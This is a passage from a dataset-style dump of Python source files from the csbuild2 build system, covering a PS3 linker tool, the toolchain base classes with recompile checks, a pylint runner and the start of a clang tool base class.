import log\nfrom ..._build.input_file import InputFile\nfrom ..._utils import ordered_set, response_file, shared_globals\n\nclass Ps3Linker(Ps3BaseTool, LinkerBase):\n\t"""\n\tPS3 linker tool implementation.\n\t"""\n\tsupportedArchitectures = { "cell" }\n\n\tinputGroups = { ".o" }\n\toutputFiles = { ".self", ".prx", ".sprx", ".a", ".spu_elf", ".spu_so" }\n\tcrossProjectDependencies = { ".prx", ".sprx", ".a" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs3BaseTool.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\n\t\tself._ldExeName = None\n\t\tself._arExeName = None\n\t\tself._linkerExeName = None\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs3BaseTool.SetupForProject(self, project)\n\n\t\t# Intentionally reimplementing LinkerBase.SetupForProject() since PS3 has different\n\t\t# requirements for dependent projects.\n\t\tlog.Linker("Verifying libraries for {}...", project)\n\n\t\t# Make sure all the library directory paths are absolute after the macro formatter has been run on them.\n\t\tself._libraryDirectories = ordered_set.OrderedSet(\n\t\t\t[os.path.abspath(directory) for directory in self._libraryDirectories]\n\t\t)\n\n\t\tif self._libraries:\n\t\t\tself._actualLibraryLocations = self._findLibraries(project, self._libraries)\n\n\t\t\tif self._actualLibraryLocations is None:\n\t\t\t\traise LibraryError(project)\n\n\t\t# Fill in the locations of the dependent projects, but only for libraries and SPU programs.\n\t\tfor dependProject in project.dependencies:\n\t\t\tif dependProject.projectType not in (\n\t\t\t\tcsbuild.ProjectType.Stub,\n\t\t\t\tPs3ProjectType.PpuSncApplication,\n\t\t\t\tPs3ProjectType.PpuGccApplication\n\t\t\t):\n\t\t\t\toutputExt = self._getOutputExtension(dependProject.projectType)\n\t\t\t\tif outputExt is not None:\n\t\t\t\t\tself._actualLibraryLocations[dependProject.outputName] = \\n\t\t\t\t\t\tos.path.join(\n\t\t\t\t\t\t\tdependProject.outputDir,\n\t\t\t\t\t\t\t"{}{}".format(dependProject.outputName, outputExt)\n\t\t\t\t\t\t)\n\n\t\tself._arExeName = {\n\t\t\tPs3ToolsetType.PpuSnc: "ps3snarl.exe",\n\t\t\tPs3ToolsetType.PpuGcc: "ppu-lv2-ar.exe",\n\t\t\tPs3ToolsetType.Spu: "spu-lv2-ar.exe",\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\n\t\tself._linkerExeName = {\n\t\t\tPs3ToolsetType.PpuSnc: "ps3ppuld.exe",\n\t\t\tPs3ToolsetType.PpuGcc: "ppu-lv2-g++.exe",\n\t\t\tPs3ToolsetType.Spu: "spu-lv2-g++.exe",\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\n\t\tassert self._arExeName and self._linkerExeName, "Invalid PS3 toolset type: {}".format(self._ps3BuildInfo.toolsetType)\n\n\tdef _getOutputFiles(self, project):\n\t\toutputFilename = "{}{}".format(project.outputName, self._getOutputExtension(project.projectType))\n\t\toutputFullPath = os.path.join(project.outputDir, outputFilename)\n\n\t\t# PS3 SPU programs and shared libraries will be considered intermediate files since they will be converted\n\t\t# to compiled obj files and embedded in PPU programs.\n\t\tif project.projectType in (Ps3ProjectType.SpuApplication, Ps3ProjectType.SpuSharedLibrary):\n\t\t\toutputFullPath = os.path.join(project.GetIntermediateDirectory(InputFile(outputFullPath)), outputFilename)\n\n\t\toutputFiles = 
[outputFullPath]\n\n\t\t# For PPU shared libraries, the linker will automatically generate a stub library and verification log.\n\t\tif project.projectType in (Ps3ProjectType.PpuSncSharedLibrary, Ps3ProjectType.PpuGccSharedLibrary):\n\t\t\toutputFiles.extend([\n\t\t\t\tos.path.join(project.outputDir, \"cellPrx_{}_stub.a\".format(project.outputName)),\n\t\t\t\tos.path.join(project.outputDir, \"cellPrx_{}_verlog.txt\".format(project.outputName)),\n\t\t\t])\n\n\t\treturn tuple(outputFiles)\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType in (Ps3ProjectType.PpuSncStaticLibrary, Ps3ProjectType.PpuGccStaticLibrary, Ps3ProjectType.SpuStaticLibrary):\n\t\t\tuseResponseFile = False\n\t\t\tcmdExe = self._getArchiverName()\n\t\t\tcmd = [\"rcs\"] \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\t\telse:\n\t\t\tuseResponseFile = True\n\t\t\tcmdExe = self._getLinkerName()\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryPathArgs() \\\n\t\t\t\t+ self._getStartGroupArgs() \\\n\t\t\t\t+ self._getLibraryArgs() \\\n\t\t\t\t+ self._getEndGroupArgs()\n\n\t\tif useResponseFile:\n\t\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\t\tif shared_globals.showCommands:\n\t\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\t\tcmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\t\telse:\n\t\t\tcmd = [cmdExe] + cmd\n\n\t\treturn cmd\n\n\tdef _findLibraries(self, project, libs):\n\t\tallLibraryDirectories = list(self._libraryDirectories) + self._ps3SystemLibPaths\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".sprx\", \".prx\", \".a\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tPs3ProjectType.PpuSncApplication: \".self\",\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: \".sprx\",\n\t\t\tPs3ProjectType.PpuSncStaticLibrary: \".a\",\n\n\t\t\tPs3ProjectType.PpuGccApplication: \".self\",\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: \".prx\",\n\t\t\tPs3ProjectType.PpuGccStaticLibrary: \".a\",\n\n\t\t\tPs3ProjectType.SpuApplication: \".spu_elf\",\n\t\t\tPs3ProjectType.SpuSharedLibrary: \".spu_so\",\n\t\t\tPs3ProjectType.SpuStaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getLinkerName(self):\n\t\treturn os.path.join(self._ps3SystemBinPath, self._linkerExeName)\n\n\tdef _getArchiverName(self):\n\t\treturn os.path.join(self._ps3SystemBinPath, self._arExeName)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = {\n\t\t\tPs3ProjectType.PpuSncApplication: [\n\t\t\t\t\"-oformat=fself\",\n\t\t\t],\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: [\n\t\t\t\t\"-oformat=fsprx\",\n\t\t\t\t\"--prx-with-runtime\",\n\t\t\t],\n\n\t\t\tPs3ProjectType.PpuGccApplication: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-Wl,-oformat=fself\",\n\t\t\t],\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: 
[\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-mprx-with-runtime\",\n\t\t\t\t\"-zgenprx\",\n\t\t\t\t\"-zgenstub\",\n\t\t\t],\n\n\t\t\tPs3ProjectType.SpuApplication: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-fstack-check\",\n\t\t\t],\n\t\t\tPs3ProjectType.SpuSharedLibrary: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-fstack-check\",\n\t\t\t\t\"-shared\",\n\t\t\t\t\"-Wl,-soname={}{}\".format(project.outputName, self._getOutputExtension(project.projectType)),\n\t\t\t],\n\t\t}.get(project.projectType, [])\n\n\t\treturn args\n\n\tdef _getCustomLinkerArgs(self):\n\t\treturn sorted(ordered_set.OrderedSet(self._linkerFlags))\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutFile = \"{}\".format(self._getOutputFiles(project)[0])\n\t\tif self._ps3BuildInfo.outputType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn [outFile]\n\t\treturn [\"-o\", outFile]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n\n\tdef _getLibraryPathArgs(self):\n\t\treturn []\n\n\tdef _getLibraryArgs(self):\n\t\targs = []\n\n\t\tfor libPath in self._actualLibraryLocations.values():\n\t\t\tlibNameExt = os.path.splitext(libPath)\n\n\t\t\t# PRX libraries can't be linked directly. We have to link against their static stub libraries\n\t\t\t# that are generated when they are built.\n\t\t\tif libNameExt[1] in (\".prx\", \".sprx\"):\n\t\t\t\tlibPath = os.path.join(os.path.dirname(libPath), \"cellPrx_{}_stub.a\".format(os.path.basename(libNameExt[0])))\n\n\t\t\telif libNameExt[1].startswith(\".spu_\"):\n\t\t\t\tlibPath = \"{}{}.a\".format(libNameExt[0], libNameExt[1].replace(\".\", \"_\"))\n\n\t\t\targs.append(libPath)\n\n\t\treturn args\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\n\t\t\t{\n\t\t\t\tPs3ToolsetType.PpuSnc: \"--start-group\",\n\t\t\t}.get(self._ps3BuildInfo.toolsetType, \"-Wl,--start-group\")\n\t\t]\n\n\tdef _getEndGroupArgs(self):\n\t\treturn [\n\t\t\t{\n\t\t\t\tPs3ToolsetType.PpuSnc: \"--end-group\",\n\t\t\t}.get(self._ps3BuildInfo.toolsetType, \"-Wl,--end-group\")\n\t\t]\n" }, { "alpha_fraction": 0.7522515654563904, "alphanum_fraction": 0.7527255415916443, "avg_line_length": 42.054420471191406, "blob_id": "1e304af7bf6e44d4fca1d5cdb26f62b733ce1960", "content_id": "9e775f838d4d8eaa06d5c66e111b70fccee11d50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12658, "license_type": "no_license", "max_line_length": 119, "num_lines": 294, "path": "/csbuild/toolchain/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n"""\n.. package:: toolchain\n\t:synopsis: General-purpose toolchain infrastructure\n\n.. moduleauthor:: Jaedyn K. Draper\n"""\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nfrom .._build import input_file\n\n_eliminatePylintAbstractMethodCheck = True\n\ndef _ignore(_):\n\tpass\n\nclass Tool(object):\n\t"""\n\tTool base class. Derive from this class to provide a tool for use in building things.\n\n\tTool constructor should take at least one argument, which will be the project settings dictionary.\n\tValues in this dictionary which pertain to the tool in question can ONLY be accessed from within that tool -\n\tthey are scoped. Thus, these values should be pulled out of the settings dict and stored as instance\n\tvariables on the tool itself, and the projectSettings dict itself should NOT be held onto -\n\tthis will ensure child classes of a tool can access all the data they need.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t"""\n\n\t#: List of file extensions to be passed to Run as individual inputs.\n\t# Run() will be called once per file as soon as each file is available to build\n\t# Example: A C++ compiler would take individual inputs of types {".c", ".cc", ".cxx", ".cpp"}\n\t# An empty string indicates a file with no extension\n\tinputFiles = set()\n\n\t#: List of file extensions to be passed to RunGroup as a group input.\n\t# RunGroup() will be called only once all tools that output this type have finished running\n\t# and will be called only once on the entire group.\n\t# Example: A C++ linker would take group inputs of types {".o"} or {".obj"} depending on the platform\n\t# An empty string indicates a file with no extension\n\t# **Note: A tool may set EITHER inputGroups OR crossProjectInputGroups, but not both.\n\t# If both are set, crossProjectInputGroups takes precedence**\n\tinputGroups = set()\n\n\t#: List of file extensions to be passed to RunGroup as a group input, collected from all dependent projects.\n\t# RunGroup() will be called only once all tools in all dependent projects that output this type have finished running\n\t# and will be called only once on the entire group.\n\t# Example: A packaging tool might take inputs of type {".so"} from dependencies and add them to the package.\n\t# An empty string indicates a file with no extension\n\t# **Note: A tool may set EITHER inputGroups OR crossProjectInputGroups, but not both.\n\t# If both are set, crossProjectInputGroups takes precedence**\n\tcrossProjectInputGroups = set()\n\n\t#: List of dependencies that will prevent Run() from being called if they're still being created,\n\t# even if they're not taken as inputs.\n\t# Example: A C++ compiler might add dependencies of type {".pch"} or {".gch"} to wait on a precompile step\n\t# An empty string indicates a file with no extension\n\tdependencies = set()\n\n\t#: The file extensions of files created by this toolchain\n\t# Example: A C++ compiler would have output files of type {".o"} or {".obj"} depending on the platform\n\t# Or a C++ linker would have output files of type {".exe", ".dll", ".lib"} or {"", ".so", ".a"}\n\t# An 
empty string indicates a file with no extension\n\toutputFiles = set()\n\n\t#: Indicates what output files (if any) must be completed on dependencies\n\t# before this tool is run on this project. Example: A C++ linker might need all dependencies to finish\n\t# generating files of type {".dll", ".lib"} or {".so", ".a"} before running itself. Any projects in the\n\t# dependency chain that generate files of that type will prevent this tool from running until it no longer\n\t# has any valid inputs for tools that will generate that output, and the outputs have all been generated.\n\tcrossProjectDependencies = set()\n\n\t#: Set of supported architectures. If this toolchain supports all possible --architecture arguments,\n\t# set this value to None. An empty set implies it supports no architectures and can never be run.\n\tsupportedArchitectures = None\n\n\t#: Set of supported platforms. If this toolchain supports all possible platforms,\n\t# set this value to None. An empty set implies it supports no platforms and can never be run.\n\tsupportedPlatforms = None\n\n\t#: Set this to a positive non-zero value to prevent this tool from being run in parallel.\n\t# This is a global setting; multiple instances of this tool will not run concurrently, even for different projects\n\tmaxParallel = 0\n\n\t#: If this is True, this tool will be the only one to act on the input files passed to it, and they will not\n\t# go to any other tool. If an input file passed to a tool marked exclusive should go to another tool, it may\n\t# be returned as an output from Run or RunGroup to forward it to the next tool. Exclusive tools for a given input\n\t# extension will always run before other tools for that input extension regardless of order in the toolchain;\n\t# if multiple tools in a toolchain are marked exclusive, the input files will only be passed to the first one;\n\t# however, if it outputs the same file type, its outputs will be passed to the second exclusive one, whose outputs\n\t# can be passed to the third, and so on; outputs from the last exclusive tool will be passed to all non-exclusive\n\t# tools accepting that file type.\n\texclusive = False\n\n\t_initialized = False\n\n\tdef __init__(self, projectSettings):\n\t\tpass\n\n\tdef SetupForProject(self, project):\n\t\t"""\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t"""\n\t\tpass\n\n\t@staticmethod\n\tdef __static_init__():\n\t\tassert not Tool._initialized\n\t\tTool._initialized = True\n\n\tdef Run(self, inputProject, inputFile):\n\t\t"""\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. 
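# --- Editor-added illustration (not part of the original source; the tool itself is hypothetical) ---
# A minimal Tool subclass wiring the class attributes above together: it claims
# ".txt" inputs, produces ".stamp" outputs, and implements Run() per the contract
# in this class. Registration mirrors how make.py earlier in this listing
# registers its Execute tool.
from csbuild.toolchain import Tool

class StampTool(Tool):
	"""Copies each input file to a '.stamp' output beside it."""
	inputFiles = { ".txt" }
	outputFiles = { ".stamp" }
	supportedArchitectures = None  # supports every architecture

	def Run(self, inputProject, inputFile):
		outPath = inputFile.filename + ".stamp"
		with open(inputFile.filename, "rb") as inFile, open(outPath, "wb") as outFile:
			outFile.write(inFile.read())
		return outPath

# csbuild.Toolchain("gcc", "msvc").AddTool(StampTool)
# --- End editor-added illustration ---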
If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\t\t:raises NotImplementedError: if the subclass defines inputFiles and does not implement it\n\t\t\"\"\"\n\t\t_ignore(inputProject)\n\t\t_ignore(inputFile)\n\t\tif _eliminatePylintAbstractMethodCheck:\n\t\t\traise NotImplementedError()\n\t\treturn \"\"\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\t\"\"\"\n\t\tExecute a group build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFiles: List of files to build\n\t\t:type inputFiles: list[input_file.InputFile]\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\t\t:raises NotImplementedError: if the subclass defines inputGroups and does not implement it\n\t\t\"\"\"\n\t\t_ignore(inputProject)\n\t\t_ignore(inputFiles)\n\t\tif _eliminatePylintAbstractMethodCheck:\n\t\t\traise NotImplementedError()\n\t\treturn \"\"\n\nclass SolutionGenerator(object):\n\t\"\"\"\n\tSolution Generator base class.\n\n\tShares a similarity with tools in that it has a list of input files (in this case, projectExtensions),\n\tbut otherwise, is little more than a wrapper around the GenerateSolution() static method, which will\n\tbe called in an OnBuildFinished hook. 
Making it a class allows extension via additional\n\tstatic data and methods.\n\t\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects):\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\tpass\n\nclass CompileChecker(object):\n\t\"\"\"\n\tClass to implement various components of checking whether a file should be recompiled.\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.memo = {} # memo.Memo()\n\n\tdef ShouldRecompile(self, fileValue, baselineValue):\n\t\t\"\"\"\n\t\tGiven a condensed value from all the input files and their dependencies,\n\t\tcheck against the baseline to determine if a recompile should be performed.\n\n\t\t:param fileValue: The condensed value for the file\n\t\t:type fileValue: any\n\t\t:param baselineValue: The baseline retrieved earlier\n\t\t:type baselineValue: any\n\t\t:return: whether or not to recompile the file\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn fileValue > baselineValue\n\n\tdef CondenseRecompileChecks(self, values):\n\t\t\"\"\"\n\t\tCondense a list of values into a single value. For example, in the default, a list of modification\n\t\ttimestamps gets condensed into the most recent modification date.\n\n\t\t:param values: The values collected from GetRecompileValue() for a list of dependencies\n\t\t:type values: list\n\t\t:return: The condensed value\n\t\t:rtype: any\n\t\t\"\"\"\n\t\treturn max(values)\n\n\tdef GetRecompileValue(self, buildProject, inputFile):\n\t\t\"\"\"\n\t\tGet a value to be used to compute recompilability. 
In the default implementation, this is a last modification date.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFile: The file to compute the value for\n\t\t:type inputFile: str\n\t\t:return: The value to be used to compute recompilability\n\t\t:rtype: any\n\t\t\"\"\"\n\t\t_ignore(buildProject)\n\t\treturn os.path.getmtime(inputFile)\n\n\tdef GetDependencies(self, buildProject, inputFile):\n\t\t\"\"\"\n\t\tGet a list of dependencies for a file.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFile: The file to check\n\t\t:type inputFile: str\n\t\t:return: List of files to depend on\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\t_ignore(inputFile)\n\t\t_ignore(buildProject)\n\t\treturn []\n\n\tdef GetRecompileBaseline(self, buildProject, inputFiles):\n\t\t\"\"\"\n\t\tGet the baseline recompile value, typically the value for the intended output of the file.\n\t\tFor example, with timestamps for a c++ toolchain, this would be the value of the .o/.obj file\n\t\tfor a given .cpp input.\n\n\t\tA return value of None forces a recompile.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFiles: List of input files\n\t\t:type inputFiles: ordered_set.OrderedSet[input_file.InputFile]\n\t\t:return: A baseline recompile value, or None to force recompile\n\t\t:rtype: any\n\t\t\"\"\"\n\t\tlastFiles = buildProject.GetLastResult(inputFiles)\n\t\tif lastFiles is not None:\n\t\t\treturn min(\n\t\t\t\t[\n\t\t\t\t\tself.GetRecompileValue(buildProject, outputFile) if os.access(outputFile, os.F_OK) else 0\n\t\t\t\t\tfor outputFile in lastFiles\n\t\t\t\t]\n\t\t\t)\n\t\treturn None\n\n\tdef __deepcopy__(self, copyMemo):\n\t\tcopyMemo[id(self)] = self\n\t\treturn self\n" }, { "alpha_fraction": 0.7426739931106567, "alphanum_fraction": 0.7495421171188354, "avg_line_length": 43.57143020629883, "blob_id": "d6a3940845120af15f7450c502e331cea7536870", "content_id": "fd14c5b303fd4396142d3acfa9a298c7ed9db2c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2184, "license_type": "permissive", "max_line_length": 120, "num_lines": 49, "path": "/csbuild/_testing/run_pylint.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
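# --- Editor-added illustration (not part of the original source; the mtimes below are hypothetical) ---
# With the default CompileChecker above, the rebuild test is plain timestamp math:
# input/dependency mtimes condense with max() (CondenseRecompileChecks), existing
# outputs condense with min() (GetRecompileBaseline), and ShouldRecompile() fires
# when the newest input beats the oldest output.
inputMtimes = [100.0, 250.0, 180.0]   # source file and its dependencies
outputMtimes = [240.0, 260.0]         # previously generated outputs

fileValue = max(inputMtimes)
baselineValue = min(outputMtimes)
assert fileValue > baselineValue      # newest input (250.0) > oldest output (240.0) -> rebuild
# --- End editor-added illustration ---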
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: run_pylint\n\t:synopsis: Local pylint install, pretty much does exactly what the main pylint file does, but doing the same thing here\n\t\t\tand invoking this file directly ensures we run with the right python version (2 or 3) so we can test both\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nif __name__ == \"__main__\":\n\timport os\n\timport sys\n\tfrom pylint import run_pylint\n\n\t# Copied from csbuild._utils because we can't import that before we set environ, and we need this to do that\n\tif sys.version_info[0] >= 3:\n\t\tdef PlatformString(inputStr):\n\t\t\t\"\"\"In the presence of unicode_literals, get an object that is type str in both python2 and python3.\"\"\"\n\t\t\tif isinstance(inputStr, str):\n\t\t\t\treturn inputStr\n\t\t\treturn inputStr.decode(\"UTF-8\")\n\telse:\n\t\tdef PlatformString(inputStr):\n\t\t\t\"\"\"In the presence of unicode_literals, get an object that is type str in both python2 and python3.\"\"\"\n\t\t\tif isinstance(inputStr, str):\n\t\t\t\treturn inputStr\n\t\t\treturn inputStr.encode(\"UTF-8\")\n\n\tos.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")] = PlatformString(\"1\")\n\trun_pylint()\n" }, { "alpha_fraction": 0.6566217541694641, "alphanum_fraction": 0.6633623838424683, "avg_line_length": 30.723270416259766, "blob_id": "0e820ba39f984a5fab818858df9aec5f1716741b", "content_id": "143ce8edd2183d5c35360831a5207de4e455cf0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5044, "license_type": "no_license", "max_line_length": 117, "num_lines": 159, "path": "/csbuild/tools/common/clang_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: clang_tool_base\n\t:synopsis: Abstract base class for clang tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport subprocess\n\nfrom abc import ABCMeta\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\nfrom ... 
import commands\n\n\n_IS_HOST_MAC_OS = platform.system() == \"Darwin\"\n\ndef _ignore(_):\n\tpass\n\ndef _noLogOnRun(shared, msg):\n\t_ignore(shared)\n\t_ignore(msg)\n\n\nclass ClangHostToolInfo(object):\n\t\"\"\"\n\tClass for maintaining data output by clang needed by the build process.\n\t\"\"\"\n\tInstance = None\n\n\tdef __init__(self):\n\t\ttry:\n\t\t\t# Verify the 'clang' program exists.\n\t\t\tsubprocess.call([\"clang\"], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Program 'clang' could not be found; please make sure you have it installed on your system\")\n\n\t\t_, targetTriplet, _ = commands.Run([\"clang\", \"-dumpmachine\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\ttargetSegments = targetTriplet.strip().split(\"-\", 1)\n\n\t\tself._nativeTargetPrefix = targetSegments[0] if targetSegments else None\n\t\tself._nativeTargetSuffix = targetSegments[1] if targetSegments and len(targetSegments) > 1 else None\n\n\t@property\n\tdef nativeTargetPrefix(self):\n\t\t\"\"\"\n\t\tReturn the native target triple prefix\n\t\t\"\"\"\n\t\treturn self._nativeTargetPrefix\n\n\t@property\n\tdef nativeTargetSuffix(self):\n\t\t\"\"\"\n\t\tReturn the native target triple suffix\n\t\t\"\"\"\n\t\treturn self._nativeTargetSuffix\n\n\n@MetaClass(ABCMeta)\nclass ClangToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targeting clang builds.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._clangToolInfo = None\n\n\n\t####################################################################################################################\n\t### Base methods\n\t####################################################################################################################\n\n\tdef _getArchitectureTargetArgs(self, project):\n\t\targs = []\n\n\t\tif _IS_HOST_MAC_OS:\n\t\t\t# Mac needs special handling since some older versions of the Apple Clang compiler have\n\t\t\t# knowledge of the arm64 architecture, but don't support using the target triple for it.\n\t\t\t# However, they all (at the time of this writing) support using the '-arch <arch-name>'\n\t\t\t# command line argument.\n\t\t\tarch = {\n\t\t\t\t\"x64\": \"x86_64\",\n\t\t\t}.get(project.architectureName, project.architectureName)\n\t\t\targs.extend([\"-arch\", arch])\n\n\t\telse:\n\t\t\ttarget = self._getArchTarget(project)\n\n\t\t\tif 